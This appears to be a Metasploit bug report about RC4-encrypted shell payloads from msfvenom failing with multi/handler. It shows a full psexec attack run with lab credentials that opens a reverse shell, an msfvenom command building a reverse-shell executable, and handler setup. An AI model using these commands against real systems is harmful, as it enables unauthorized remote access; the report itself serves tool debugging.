Open
Description
It appears that RC4 encrypted shell payloads built with venom are incompatible with rc4 encrypted handlers in framework? Automated testing suggests this is something across both staged and stageless x86 and x64 windows shell payloads. (Unsure if this is also a mettle problem)
This is not the case with rc4 encrypted payloads created by framework for use in exploits; those appear to work. It is only when you build the payload in venom and call back to a multi/handler.
Meterpreter sessions do not appear to be affected.
Works fine as part of an exploit:
msf5 exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.134.164 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass vagrant no The password for the specified username
SMBUser vagrant no The username to authenticate as
Payload options (windows/x64/shell/reverse_tcp_rc4):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.135.168 yes The listen address (an interface may be specified)
LPORT 4567 yes The listen port
RC4PASSWORD msf yes Password to derive RC4 key from
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/smb/psexec) > set rc4password secret
rc4password => secret
msf5 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 192.168.135.168:4567
[*] 192.168.134.164:445 - Connecting to the server...
[*] 192.168.134.164:445 - Authenticating to 192.168.134.164:445 as user 'vagrant'...
[!] 192.168.134.164:445 - No active DB -- Credential data will not be saved!
[*] 192.168.134.164:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 192.168.134.164:445 - PowerShell found
[*] 192.168.134.164:445 - Selecting PowerShell target
[*] 192.168.134.164:445 - Powershell command length: 2788
[*] 192.168.134.164:445 - Executing the payload...
[*] 192.168.134.164:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.134.164[\svcctl] ...
[*] 192.168.134.164:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.134.164[\svcctl] ...
[*] 192.168.134.164:445 - Obtaining a service manager handle...
[*] 192.168.134.164:445 - Creating the service...
[+] 192.168.134.164:445 - Successfully created the service
[*] 192.168.134.164:445 - Starting the service...
[*] Sending stage (340 bytes) to 192.168.134.164
[+] 192.168.134.164:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.134.164:445 - Removing the service...
[+] 192.168.134.164:445 - Successfully removed the service
[*] 192.168.134.164:445 - Closing service handle...
[*] Command shell session 1 opened (192.168.135.168:4567 -> 192.168.134.164:49945) at 2019-10-30 06:38:03 -0500
ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : moose
IPv6 Address. . . . . . . . . . . : fd34:fe56:7891:2f3b:4cd1:ef19:f75f:fe57
IPv6 Address. . . . . . . . . . . : fd34:fe56:7891:2f3b:ffff:defb:a366:5d3
Temporary IPv6 Address. . . . . . : fd34:fe56:7891:2f3b:38f0:fd27:85f1:52ab
Link-local IPv6 Address . . . . . : fe80::4cd1:ef19:f75f:fe57%4
IPv4 Address. . . . . . . . . . . : 192.168.134.164
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::21b:21ff:fe36:e9b5%4
192.168.134.254
C:\Windows\system32>exit
exit
Fails when using venom:
tmoose@ubuntu:~/rapid7/metasploit-framework$ ./msfvenom -p windows/shell/reverse_tcp_rc4 -f exe -o winshellrc4.exe RC4PASSWORD=secret LHOST=192.168.135.168 LPORT=4567
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 458 bytes
Final size of exe file: 73802 bytes
Saved as: winshellrc4.exe
msf5 exploit(multi/handler) > set payload windows/shell/reverse_tcp_rc4
payload => windows/shell/reverse_tcp_rc4
msf5 exploit(multi/handler) > set lhost 192.168.135.168
lhost => 192.168.135.168
msf5 exploit(multi/handler) > set lport 4567
lport => 4567
msf5 exploit(multi/handler) > set rc4password secret
rc4password => secret
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.135.168:4567
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (271 bytes) to 192.168.134.164
[*] Command shell session 2 opened (192.168.135.168:4567 -> 192.168.134.164:51479) at 2019-10-30 06:49:00 -0500
ipconfig
ipconfig
^C
I'm on commit b7acbfe